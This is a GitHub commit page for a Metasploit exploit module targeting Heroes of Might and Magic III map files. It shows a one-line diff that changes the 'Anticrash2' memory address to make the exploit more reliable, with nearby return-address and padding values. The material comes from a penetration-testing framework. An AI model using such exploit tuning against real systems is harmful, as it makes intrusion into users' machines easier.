Skip to content

Commit

Permalink
fix unreliable address
Browse files Browse the repository at this point in the history
  • Loading branch information
aakerblom committed Aug 1, 2015
1 parent 908d6f9 commit 7af83a1
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion modules/exploits/windows/fileformat/homm3_h3m.rb
Original file line number Diff line number Diff line change
Expand Up @@ -95,7 +95,7 @@ def initialize(info = {})
# MOV EAX,DWORD PTR SS:[EBP+38] ; [Anticrash1 + 0x38]
'Anticrash1' => 0x00580C0F, # Coincidentally the Ret value from HD Mod target
# Anticrash2, see documentation for Anticrash1 (not 2) in H3 Complete 4.0.0.0 target
'Anticrash2' => 0x001899A8,
'Anticrash2' => 0x005CE200,
'Ret' => 0x0043EAB1, # CALL ESP h3demo.exe
'Padding' => 109 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
}
Expand Down

0 comments on commit 7af83a1

Please sign in to comment.